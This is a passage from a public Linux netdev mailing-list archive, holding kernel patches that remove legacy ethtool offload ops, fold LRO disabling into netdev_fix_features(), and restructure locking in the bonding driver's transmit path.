-int ethtool_op_set_tx_ipv6_csum(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM;
-	else
-		dev->features &= ~(NETIF_F_IP_CSUM | NETIF_F_IPV6_CSUM);
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tx_ipv6_csum);
-
-u32 ethtool_op_get_sg(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_SG) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_sg);
-
-int ethtool_op_set_sg(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_SG;
-	else
-		dev->features &= ~NETIF_F_SG;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_sg);
-
-u32 ethtool_op_get_tso(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_TSO) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_tso);
-
-int ethtool_op_set_tso(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_TSO;
-	else
-		dev->features &= ~NETIF_F_TSO;
-
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_tso);
-
-u32 ethtool_op_get_ufo(struct net_device *dev)
-{
-	return (dev->features & NETIF_F_UFO) != 0;
-}
-EXPORT_SYMBOL(ethtool_op_get_ufo);
-
-int ethtool_op_set_ufo(struct net_device *dev, u32 data)
-{
-	if (data)
-		dev->features |= NETIF_F_UFO;
-	else
-		dev->features &= ~NETIF_F_UFO;
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_ufo);
-
-/* the following list of flags are the same as their associated
- * NETIF_F_xxx values in include/linux/netdevice.h
- */
-static const u32 flags_dup_features =
-	(ETH_FLAG_LRO | ETH_FLAG_RXVLAN | ETH_FLAG_TXVLAN | ETH_FLAG_NTUPLE |
-	 ETH_FLAG_RXHASH);
-
-u32 ethtool_op_get_flags(struct net_device *dev)
-{
-	/* in the future, this function will probably contain additional
-	 * handling for flags which are not so easily handled
-	 * by a simple masking operation
-	 */
-
-	return dev->features & flags_dup_features;
-}
-EXPORT_SYMBOL(ethtool_op_get_flags);
-
-/* Check if device can enable (or disable) particular feature coded in "data"
- * argument. Flags "supported" describe features that can be toggled by device.
- * If feature can not be toggled, it state (enabled or disabled) must match
- * hardcoded device features state, otherwise flags are marked as invalid.
- */
-bool ethtool_invalid_flags(struct net_device *dev, u32 data, u32 supported)
-{
-	u32 features = dev->features & flags_dup_features;
-	/* "data" can contain only flags_dup_features bits,
-	 * see __ethtool_set_flags */
-
-	return (features & ~supported) != (data & ~supported);
-}
-EXPORT_SYMBOL(ethtool_invalid_flags);
-
-int ethtool_op_set_flags(struct net_device *dev, u32 data, u32 supported)
-{
-	if (ethtool_invalid_flags(dev, data, supported))
-		return -EINVAL;
-
-	dev->features = ((dev->features & ~flags_dup_features) |
-			 (data & flags_dup_features));
-	return 0;
-}
-EXPORT_SYMBOL(ethtool_op_set_flags);
-
 void ethtool_ntuple_flush(struct net_device *dev)
 {
 	struct ethtool_rx_ntuple_flow_spec_container *fsc, *f;
@@ -185,76 +52,6 @@ EXPORT_SYMBOL(ethtool_ntuple_flush);
 
 #define ETHTOOL_DEV_FEATURE_WORDS	1
 
-static void ethtool_get_features_compat(struct net_device *dev,
-	struct ethtool_get_features_block *features)
-{
-	if (!dev->ethtool_ops)
-		return;
-
-	/* getting RX checksum */
-	if (dev->ethtool_ops->get_rx_csum)
-		if (dev->ethtool_ops->get_rx_csum(dev))
-			features[0].active |= NETIF_F_RXCSUM;
-
-	/* mark legacy-changeable features */
-	if (dev->ethtool_ops->set_sg)
-		features[0].available |= NETIF_F_SG;
-	if (dev->ethtool_ops->set_tx_csum)
-		features[0].available |= NETIF_F_ALL_CSUM;
-	if (dev->ethtool_ops->set_tso)
-		features[0].available |= NETIF_F_ALL_TSO;
-	if (dev->ethtool_ops->set_rx_csum)
-		features[0].available |= NETIF_F_RXCSUM;
-	if (dev->ethtool_ops->set_flags)
-		features[0].available |= flags_dup_features;
-}
-
-static int ethtool_set_feature_compat(struct net_device *dev,
-	int (*legacy_set)(struct net_device *, u32),
-	struct ethtool_set_features_block *features, u32 mask)
-{
-	u32 do_set;
-
-	if (!legacy_set)
-		return 0;
-
-	if (!(features[0].valid & mask))
-		return 0;
-
-	features[0].valid &= ~mask;
-
-	do_set = !!(features[0].requested & mask);
-
-	if (legacy_set(dev, do_set) < 0)
-		netdev_info(dev,
-			"Legacy feature change (%s) failed for 0x%08x\n",
-			do_set ? "set" : "clear", mask);
-
-	return 1;
-}
-
-static int ethtool_set_features_compat(struct net_device *dev,
-	struct ethtool_set_features_block *features)
-{
-	int compat;
-
-	if (!dev->ethtool_ops)
-		return 0;
-
-	compat  = ethtool_set_feature_compat(dev, dev->ethtool_ops->set_sg,
-		features, NETIF_F_SG);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_tx_csum,
-		features, NETIF_F_ALL_CSUM);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_tso,
-		features, NETIF_F_ALL_TSO);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_rx_csum,
-		features, NETIF_F_RXCSUM);
-	compat |= ethtool_set_feature_compat(dev, dev->ethtool_ops->set_flags,
-		features, flags_dup_features);
-
-	return compat;
-}
-
 static int ethtool_get_features(struct net_device *dev, void __user *useraddr)
 {
 	struct ethtool_gfeatures cmd = {
@@ -272,8 +69,6 @@ static int ethtool_get_features(struct net_device *dev, void __user *useraddr)
 	u32 __user *sizeaddr;
 	u32 copy_size;
 
-	ethtool_get_features_compat(dev, features);
-
 	sizeaddr = useraddr + offsetof(struct ethtool_gfeatures, size);
 	if (get_user(copy_size, sizeaddr))
 		return -EFAULT;
@@ -309,9 +104,6 @@ static int ethtool_set_features(struct net_device *dev, void __user *useraddr)
 	if (features[0].valid & ~NETIF_F_ETHTOOL_BITS)
 		return -EINVAL;
 
-	if (ethtool_set_features_compat(dev, features))
-		ret |= ETHTOOL_F_COMPAT;
-
 	if (features[0].valid & ~dev->hw_features) {
 		features[0].valid &= dev->hw_features;
 		ret |= ETHTOOL_F_UNSUPPORTED;
@@ -422,34 +214,6 @@ static u32 ethtool_get_feature_mask(u32 eth_cmd)
 	}
 }
 
-static void *__ethtool_get_one_feature_actor(struct net_device *dev, u32 ethcmd)
-{
-	const struct ethtool_ops *ops = dev->ethtool_ops;
-
-	if (!ops)
-		return NULL;
-
-	switch (ethcmd) {
-	case ETHTOOL_GTXCSUM:
-		return ops->get_tx_csum;
-	case ETHTOOL_GRXCSUM:
-		return ops->get_rx_csum;
-	case ETHTOOL_SSG:
-		return ops->get_sg;
-	case ETHTOOL_STSO:
-		return ops->get_tso;
-	case ETHTOOL_SUFO:
-		return ops->get_ufo;
-	default:
-		return NULL;
-	}
-}
-
-static u32 __ethtool_get_rx_csum_oldbug(struct net_device *dev)
-{
-	return !!(dev->features & NETIF_F_ALL_CSUM);
-}
-
 static int ethtool_get_one_feature(struct net_device *dev,
 	char __user *useraddr, u32 ethcmd)
 {
@@ -459,31 +223,11 @@ static int ethtool_get_one_feature(struct net_device *dev,
 		.data = !!(dev->features & mask),
 	};
 
-	/* compatibility with discrete get_ ops */
-	if (!(dev->hw_features & mask)) {
-		u32 (*actor)(struct net_device *);
-
-		actor = __ethtool_get_one_feature_actor(dev, ethcmd);
-
-		/* bug compatibility with old get_rx_csum */
-		if (ethcmd == ETHTOOL_GRXCSUM && !actor)
-			actor = __ethtool_get_rx_csum_oldbug;
-
-		if (actor)
-			edata.data = actor(dev);
-	}
-
 	if (copy_to_user(useraddr, &edata, sizeof(edata)))
 		return -EFAULT;
 	return 0;
 }
 
-static int __ethtool_set_tx_csum(struct net_device *dev, u32 data);
-static int __ethtool_set_rx_csum(struct net_device *dev, u32 data);
-static int __ethtool_set_sg(struct net_device *dev, u32 data);
-static int __ethtool_set_tso(struct net_device *dev, u32 data);
-static int __ethtool_set_ufo(struct net_device *dev, u32 data);
-
 static int ethtool_set_one_feature(struct net_device *dev,
 	void __user *useraddr, u32 ethcmd)
 {
@@ -495,56 +239,38 @@ static int ethtool_set_one_feature(struct net_device *dev,
 
 	mask = ethtool_get_feature_mask(ethcmd);
 	mask &= dev->hw_features;
-	if (mask) {
-		if (edata.data)
-			dev->wanted_features |= mask;
-		else
-			dev->wanted_features &= ~mask;
-
-		__netdev_update_features(dev);
-		return 0;
-	}
-
-	/* Driver is not converted to ndo_fix_features or does not
-	 * support changing this offload. In the latter case it won't
-	 * have corresponding ethtool_ops field set.
-	 *
-	 * Following part is to be removed after all drivers advertise
-	 * their changeable features in netdev->hw_features and stop
-	 * using discrete offload setting ops.
-	 */
-
-	switch (ethcmd) {
-	case ETHTOOL_STXCSUM:
-		return __ethtool_set_tx_csum(dev, edata.data);
-	case ETHTOOL_SRXCSUM:
-		return __ethtool_set_rx_csum(dev, edata.data);
-	case ETHTOOL_SSG:
-		return __ethtool_set_sg(dev, edata.data);
-	case ETHTOOL_STSO:
-		return __ethtool_set_tso(dev, edata.data);
-	case ETHTOOL_SUFO:
-		return __ethtool_set_ufo(dev, edata.data);
-	default:
+	if (!mask)
 		return -EOPNOTSUPP;
-	}
+
+	if (edata.data)
+		dev->wanted_features |= mask;
+	else
+		dev->wanted_features &= ~mask;
+
+	__netdev_update_features(dev);
+
+	return 0;
+}
+
+/* the following list of flags are the same as their associated
+ * NETIF_F_xxx values in include/linux/netdevice.h
+ */
+static const u32 flags_dup_features =
+	(ETH_FLAG_LRO | ETH_FLAG_RXVLAN | ETH_FLAG_TXVLAN | ETH_FLAG_NTUPLE |
+	 ETH_FLAG_RXHASH);
+
+static u32 __ethtool_get_flags(struct net_device *dev)
+{
+	return dev->features & flags_dup_features;
 }
 
-int __ethtool_set_flags(struct net_device *dev, u32 data)
+static int __ethtool_set_flags(struct net_device *dev, u32 data)
 {
 	u32 changed;
 
 	if (data & ~flags_dup_features)
 		return -EINVAL;
 
-	/* legacy set_flags() op */
-	if (dev->ethtool_ops->set_flags) {
-		if (unlikely(dev->hw_features & flags_dup_features))
-			netdev_warn(dev,
-				"driver BUG: mixed hw_features and set_flags()\n");
-		return dev->ethtool_ops->set_flags(dev, data);
-	}
-
 	/* allow changing only bits set in hw_features */
 	changed = (data ^ dev->features) & flags_dup_features;
 	if (changed & ~dev->hw_features)
@@ -1502,81 +1228,6 @@ static int ethtool_set_pauseparam(struct net_device *dev, void __user *useraddr)
 	return dev->ethtool_ops->set_pauseparam(dev, &pauseparam);
 }
 
-static int __ethtool_set_sg(struct net_device *dev, u32 data)
-{
-	int err;
-
-	if (!dev->ethtool_ops->set_sg)
-		return -EOPNOTSUPP;
-
-	if (data && !(dev->features & NETIF_F_ALL_CSUM))
-		return -EINVAL;
-
-	if (!data && dev->ethtool_ops->set_tso) {
-		err = dev->ethtool_ops->set_tso(dev, 0);
-		if (err)
-			return err;
-	}
-
-	if (!data && dev->ethtool_ops->set_ufo) {
-		err = dev->ethtool_ops->set_ufo(dev, 0);
-		if (err)
-			return err;
-	}
-	return dev->ethtool_ops->set_sg(dev, data);
-}
-
-static int __ethtool_set_tx_csum(struct net_device *dev, u32 data)
-{
-	int err;
-
-	if (!dev->ethtool_ops->set_tx_csum)
-		return -EOPNOTSUPP;
-
-	if (!data && dev->ethtool_ops->set_sg) {
-		err = __ethtool_set_sg(dev, 0);
-		if (err)
-			return err;
-	}
-
-	return dev->ethtool_ops->set_tx_csum(dev, data);
-}
-
-static int __ethtool_set_rx_csum(struct net_device *dev, u32 data)
-{
-	if (!dev->ethtool_ops->set_rx_csum)
-		return -EOPNOTSUPP;
-
-	if (!data)
-		dev->features &= ~NETIF_F_GRO;
-
-	return dev->ethtool_ops->set_rx_csum(dev, data);
-}
-
-static int __ethtool_set_tso(struct net_device *dev, u32 data)
-{
-	if (!dev->ethtool_ops->set_tso)
-		return -EOPNOTSUPP;
-
-	if (data && !(dev->features & NETIF_F_SG))
-		return -EINVAL;
-
-	return dev->ethtool_ops->set_tso(dev, data);
-}
-
-static int __ethtool_set_ufo(struct net_device *dev, u32 data)
-{
-	if (!dev->ethtool_ops->set_ufo)
-		return -EOPNOTSUPP;
-	if (data && !(dev->features & NETIF_F_SG))
-		return -EINVAL;
-	if (data && !((dev->features & NETIF_F_GEN_CSUM) ||
-		(dev->features & (NETIF_F_IP_CSUM|NETIF_F_IPV6_CSUM))
-			== (NETIF_F_IP_CSUM|NETIF_F_IPV6_CSUM)))
-		return -EINVAL;
-	return dev->ethtool_ops->set_ufo(dev, data);
-}
-
 static int ethtool_self_test(struct net_device *dev, char __user *useraddr)
 {
 	struct ethtool_test test;
@@ -1965,9 +1616,7 @@ int dev_ethtool(struct net *net, struct ifreq *ifr)
 		break;
 	case ETHTOOL_GFLAGS:
 		rc = ethtool_get_value(dev, useraddr, ethcmd,
-				       (dev->ethtool_ops->get_flags ?
-					dev->ethtool_ops->get_flags :
-					ethtool_op_get_flags));
+					__ethtool_get_flags);
 		break;
 	case ETHTOOL_SFLAGS:
 		rc = ethtool_set_value(dev, useraddr, __ethtool_set_flags);
-- 
1.7.2.5


^ permalink raw reply related

* [RFC PATCH] net: fold dev_disable_lro() into netdev_fix_features()
From: Michał Mirosław @ 2011-05-07 11:48 UTC (permalink / raw)
  To: netdev
  Cc: David S. Miller, Stephen Hemminger, Alexey Kuznetsov,
	Pekka Savola (ipv6), James Morris, Hideaki YOSHIFUJI,
	Patrick McHardy, Eric Dumazet, Tom Herbert, Ben Hutchings, bridge

This moves checks that device is forwarding from bridge, IPv4 and IPv6
code into netdev_fix_features(). As a side effect, after device is no longer
forwarding it gets LRO back. This also means that user is not allowed to
enable LRO after device is put to forwarding mode.

This patch depends on removal of discrete offload setting ethtool ops.

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---
 include/linux/netdevice.h |    1 -
 net/bridge/br_if.c        |    6 +++---
 net/core/dev.c            |   41 +++++++++++++++++++++--------------------
 net/ipv4/devinet.c        |   20 +++++++++-----------
 net/ipv6/addrconf.c       |    7 +++----
 5 files changed, 36 insertions(+), 39 deletions(-)

diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index 7be3ca2..3a8c21d 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -1627,7 +1627,6 @@ extern struct net_device	*__dev_get_by_name(struct net *net, const char *name);
 extern int		dev_alloc_name(struct net_device *dev, const char *name);
 extern int		dev_open(struct net_device *dev);
 extern int		dev_close(struct net_device *dev);
-extern void		dev_disable_lro(struct net_device *dev);
 extern int		dev_queue_xmit(struct sk_buff *skb);
 extern int		register_netdevice(struct net_device *dev);
 extern void		unregister_netdevice_queue(struct net_device *dev,
diff --git a/net/bridge/br_if.c b/net/bridge/br_if.c
index 5dbdfdf..62aab1e 100644
--- a/net/bridge/br_if.c
+++ b/net/bridge/br_if.c
@@ -158,6 +158,8 @@ static void del_nbp(struct net_bridge_port *p)
 	br_netpoll_disable(p);
 
 	call_rcu(&p->rcu, destroy_nbp_rcu);
+
+	netdev_update_features(dev);
 }
 
 /* called with RTNL */
@@ -368,11 +370,9 @@ int br_add_if(struct net_bridge *br, struct net_device *dev)
 
 	dev->priv_flags |= IFF_BRIDGE_PORT;
 
-	dev_disable_lro(dev);
-
 	list_add_rcu(&p->list, &br->port_list);
 
-	netdev_update_features(br->dev);
+	netdev_update_features(dev);
 
 	spin_lock_bh(&br->lock);
 	changed_addr = br_stp_recalculate_bridge_id(br);
diff --git a/net/core/dev.c b/net/core/dev.c
index 7193499..3d646c9 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -132,6 +132,7 @@
 #include <trace/events/skb.h>
 #include <linux/pci.h>
 #include <linux/inetdevice.h>
+#include <net/addrconf.h>
 #include <linux/cpu_rmap.h>
 
 #include "net-sysfs.h"
@@ -1294,26 +1295,6 @@ int dev_close(struct net_device *dev)
 EXPORT_SYMBOL(dev_close);
 
 
-/**
- *	dev_disable_lro - disable Large Receive Offload on a device
- *	@dev: device
- *
- *	Disable Large Receive Offload (LRO) on a net device.  Must be
- *	called under RTNL.  This is needed if received packets may be
- *	forwarded to another interface.
- */
-void dev_disable_lro(struct net_device *dev)
-{
-	dev->wanted_features &= ~NETIF_F_LRO;
-	netdev_update_features(dev);
-
-	if (unlikely(dev->features & NETIF_F_LRO))
-		netdev_WARN(dev, "failed to disable LRO!\n");
-
-}
-EXPORT_SYMBOL(dev_disable_lro);
-
-
 static int dev_boot_phase = 1;
 
 /**
@@ -5239,6 +5220,26 @@ u32 netdev_fix_features(struct net_device *dev, u32 features)
 		}
 	}
 
+	if (features & NETIF_F_LRO) {
+		struct in_device *in4_dev;
+		struct inet6_dev *in6_dev;
+
+		/* disable LRO for bridge ports */
+		if (dev->priv_flags & IFF_BRIDGE_PORT) {
+			netdev_info(dev, "Disabling LRO for bridge port.\n");
+			features &= NETIF_F_LRO;
+		} else /* ... or when forwarding IPv4 */
+		if (((in4_dev = __in_dev_get_rtnl(dev))) &&
+		    IN_DEV_CONF_GET(in4_dev, FORWARDING)) {
+			netdev_info(dev, "Disabling LRO for IPv4 router port.\n");
+			features &= NETIF_F_LRO;
+		} else /* ... or when forwarding IPv6 */
+		if (((in6_dev = __in6_dev_get(dev))) && in6_dev->cnf.forwarding) {
+			netdev_info(dev, "Disabling LRO for IPv6 router port.\n");
+			features &= NETIF_F_LRO;
+		}
+	}
+
 	return features;
 }
 EXPORT_SYMBOL(netdev_fix_features);
diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
index cd9ca08..e9c0557 100644
--- a/net/ipv4/devinet.c
+++ b/net/ipv4/devinet.c
@@ -245,8 +245,6 @@ static struct in_device *inetdev_init(struct net_device *dev)
 	in_dev->arp_parms = neigh_parms_alloc(dev, &arp_tbl);
 	if (!in_dev->arp_parms)
 		goto out_kfree;
-	if (IPV4_DEVCONF(in_dev->cnf, FORWARDING))
-		dev_disable_lro(dev);
 	/* Reference in_dev->dev */
 	dev_hold(dev);
 	/* Account for reference dev->ip_ptr (below) */
@@ -259,6 +257,8 @@ static struct in_device *inetdev_init(struct net_device *dev)
 
 	/* we can receive as soon as ip_ptr is set -- do this last */
 	rcu_assign_pointer(dev->ip_ptr, in_dev);
+
+	netdev_update_features(dev);
 out:
 	return in_dev;
 out_kfree:
@@ -1475,14 +1475,12 @@ static void inet_forward_change(struct net *net)
 	IPV4_DEVCONF_DFLT(net, FORWARDING) = on;
 
 	for_each_netdev(net, dev) {
-		struct in_device *in_dev;
-		if (on)
-			dev_disable_lro(dev);
-		rcu_read_lock();
-		in_dev = __in_dev_get_rcu(dev);
-		if (in_dev)
+		struct in_device *in_dev = __in_dev_get_rtnl(dev);
+
+		if (in_dev) {
 			IN_DEV_CONF_SET(in_dev, FORWARDING, on);
-		rcu_read_unlock();
+			netdev_update_features(in_dev->dev);
+		}
 	}
 }
 
@@ -1527,11 +1525,11 @@ static int devinet_sysctl_forward(ctl_table *ctl, int write,
 			}
 			if (valp == &IPV4_DEVCONF_ALL(net, FORWARDING)) {
 				inet_forward_change(net);
-			} else if (*valp) {
+			} else {
 				struct ipv4_devconf *cnf = ctl->extra1;
 				struct in_device *idev =
 					container_of(cnf, struct in_device, cnf);
-				dev_disable_lro(idev->dev);
+				netdev_update_features(idev->dev);
 			}
 			rtnl_unlock();
 			rt_cache_flush(net, 0);
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index f2f9b2e..d1344ac 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -370,8 +370,6 @@ static struct inet6_dev * ipv6_add_dev(struct net_device *dev)
 		kfree(ndev);
 		return NULL;
 	}
-	if (ndev->cnf.forwarding)
-		dev_disable_lro(dev);
 	/* We refer to the device */
 	dev_hold(dev);
 
@@ -435,6 +433,7 @@ static struct inet6_dev * ipv6_add_dev(struct net_device *dev)
 	addrconf_sysctl_register(ndev);
 	/* protected by rtnl_lock */
 	rcu_assign_pointer(dev->ip6_ptr, ndev);
+	netdev_update_features(dev);
 
 	/* Join all-node multicast group */
 	ipv6_dev_mc_inc(dev, &in6addr_linklocal_allnodes);
@@ -469,8 +468,6 @@ static void dev_forward_change(struct inet6_dev *idev)
 	if (!idev)
 		return;
 	dev = idev->dev;
-	if (idev->cnf.forwarding)
-		dev_disable_lro(dev);
 	if (dev && (dev->flags & IFF_MULTICAST)) {
 		if (idev->cnf.forwarding)
 			ipv6_dev_mc_inc(dev, &in6addr_linklocal_allrouters);
@@ -486,6 +483,8 @@ static void dev_forward_change(struct inet6_dev *idev)
 		else
 			addrconf_leave_anycast(ifa);
 	}
+
+	netdev_update_features(dev);
 }
 
 
-- 
1.7.2.5


^ permalink raw reply related

* [PATCH] net: bonding: factor out rlock(bond->lock) in xmit path
From: Michał Mirosław @ 2011-05-07 11:48 UTC (permalink / raw)
  To: netdev; +Cc: Jay Vosburgh, Andy Gospodarek

Pull read_lock(&bond->lock) and BOND_IS_OK() to bond_start_xmit() from
mode-dependent xmit functions.

netif_running() is always true in hard_start_xmit.

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---
 drivers/net/bonding/bond_3ad.c  |   10 +-----
 drivers/net/bonding/bond_alb.c  |   11 +-----
 drivers/net/bonding/bond_main.c |   74 +++++++++++++++++----------------------
 3 files changed, 35 insertions(+), 60 deletions(-)

diff --git a/drivers/net/bonding/bond_3ad.c b/drivers/net/bonding/bond_3ad.c
index d4160f8..c7537abc 100644
--- a/drivers/net/bonding/bond_3ad.c
+++ b/drivers/net/bonding/bond_3ad.c
@@ -2403,14 +2403,6 @@ int bond_3ad_xmit_xor(struct sk_buff *skb, struct net_device *dev)
 	struct ad_info ad_info;
 	int res = 1;
 
-	/* make sure that the slaves list will
-	 * not change during tx
-	 */
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
-
 	if (bond_3ad_get_active_agg_info(bond, &ad_info)) {
 		pr_debug("%s: Error: bond_3ad_get_active_agg_info failed\n",
 			 dev->name);
@@ -2464,7 +2456,7 @@ out:
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
diff --git a/drivers/net/bonding/bond_alb.c b/drivers/net/bonding/bond_alb.c
index 3b7b040..8f2d2e7 100644
--- a/drivers/net/bonding/bond_alb.c
+++ b/drivers/net/bonding/bond_alb.c
@@ -1225,16 +1225,10 @@ int bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev)
 	skb_reset_mac_header(skb);
 	eth_data = eth_hdr(skb);
 
-	/* make sure that the curr_active_slave and the slaves list do
-	 * not change during tx
+	/* make sure that the curr_active_slave do not change during tx
 	 */
-	read_lock(&bond->lock);
 	read_lock(&bond->curr_slave_lock);
 
-	if (!BOND_IS_OK(bond)) {
-		goto out;
-	}
-
 	switch (ntohs(skb->protocol)) {
 	case ETH_P_IP: {
 		const struct iphdr *iph = ip_hdr(skb);
@@ -1334,13 +1328,12 @@ int bond_alb_xmit(struct sk_buff *skb, struct net_device *bond_dev)
 		}
 	}
 
-out:
 	if (res) {
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
 	read_unlock(&bond->curr_slave_lock);
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index 04a2205..1f8902e 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -3975,10 +3975,6 @@ static int bond_xmit_roundrobin(struct sk_buff *skb, struct net_device *bond_dev
 	int i, slave_no, res = 1;
 	struct iphdr *iph = ip_hdr(skb);
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
 	/*
 	 * Start with the curr_active_slave that joined the bond as the
 	 * default for sending IGMP traffic.  For failover purposes one
@@ -4025,7 +4021,7 @@ out:
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
@@ -4039,24 +4035,18 @@ static int bond_xmit_activebackup(struct sk_buff *skb, struct net_device *bond_d
 	struct bonding *bond = netdev_priv(bond_dev);
 	int res = 1;
 
-	read_lock(&bond->lock);
 	read_lock(&bond->curr_slave_lock);
 
-	if (!BOND_IS_OK(bond))
-		goto out;
+	if (bond->curr_active_slave)
+		res = bond_dev_queue_xmit(bond, skb,
+			bond->curr_active_slave->dev);
 
-	if (!bond->curr_active_slave)
-		goto out;
-
-	res = bond_dev_queue_xmit(bond, skb, bond->curr_active_slave->dev);
-
-out:
 	if (res)
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 
 	read_unlock(&bond->curr_slave_lock);
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
@@ -4073,11 +4063,6 @@ static int bond_xmit_xor(struct sk_buff *skb, struct net_device *bond_dev)
 	int i;
 	int res = 1;
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
-
 	slave_no = bond->xmit_hash_policy(skb, bond->slave_cnt);
 
 	bond_for_each_slave(bond, slave, i) {
@@ -4097,12 +4082,11 @@ static int bond_xmit_xor(struct sk_buff *skb, struct net_device *bond_dev)
 		}
 	}
 
-out:
 	if (res) {
 		/* no suitable interface, frame not sent */
 		dev_kfree_skb(skb);
 	}
-	read_unlock(&bond->lock);
+
 	return NETDEV_TX_OK;
 }
 
@@ -4117,11 +4101,6 @@ static int bond_xmit_broadcast(struct sk_buff *skb, struct net_device *bond_dev)
 	int i;
 	int res = 1;
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond))
-		goto out;
-
 	read_lock(&bond->curr_slave_lock);
 	start_at = bond->curr_active_slave;
 	read_unlock(&bond->curr_slave_lock);
@@ -4160,7 +4139,6 @@ out:
 		dev_kfree_skb(skb);
 
 	/* frame sent to all suitable interfaces */
-	read_unlock(&bond->lock);
 	return NETDEV_TX_OK;
 }
 
@@ -4192,10 +4170,8 @@ static inline int bond_slave_override(struct bonding *bond,
 	struct slave *slave = NULL;
 	struct slave *check_slave;
 
-	read_lock(&bond->lock);
-
-	if (!BOND_IS_OK(bond) || !skb->queue_mapping)
-		goto out;
+	if (!skb->queue_mapping)
+		return 1;
 
 	/* Find out if any slaves have the same mapping as this skb. */
 	bond_for_each_slave(bond, check_slave, i) {
@@ -4211,8 +4187,6 @@ static inline int bond_slave_override(struct bonding *bond,
 		res = bond_dev_queue_xmit(bond, skb, slave->dev);
 	}
 
-out:
-	read_unlock(&bond->lock);
 	return res;
 }
 
@@ -4234,17 +4208,10 @@ static u16 bond_select_queue(struct net_device *dev, struct sk_buff *skb)
 	return txq;
 }
 
-static netdev_tx_t bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
+static netdev_tx_t __bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
 {
 	struct bonding *bond = netdev_priv(dev);
 
-	/*
-	 * If we risk deadlock from transmitting this in the
-	 * netpoll path, tell netpoll to queue the frame for later tx
-	 */
-	if (is_netpoll_tx_blocked(dev))
-		return NETDEV_TX_BUSY;
-
 	if (TX_QUEUE_OVERRIDE(bond->params.mode)) {
 		if (!bond_slave_override(bond, skb))
 			return NETDEV_TX_OK;
@@ -4274,6 +4241,29 @@ static netdev_tx_t bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
 	}
 }
 
+static netdev_tx_t bond_start_xmit(struct sk_buff *skb, struct net_device *dev)
+{
+	struct bonding *bond = netdev_priv(dev);
+	netdev_tx_t ret = NETDEV_TX_OK;
+
+	/*
+	 * If we risk deadlock from transmitting this in the
+	 * netpoll path, tell netpoll to queue the frame for later tx
+	 */
+	if (is_netpoll_tx_blocked(dev))
+		return NETDEV_TX_BUSY;
+
+	read_lock(&bond->lock);
+
+	if (bond->slave_cnt)
+		ret = __bond_start_xmit(skb, dev);
+	else
+		dev_kfree_skb(skb);
+
+	read_unlock(&bond->lock);
+
+	return ret;
+}
 
 /*
  * set bond mode specific net device operations
-- 
1.7.2.5


^ permalink raw reply related

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox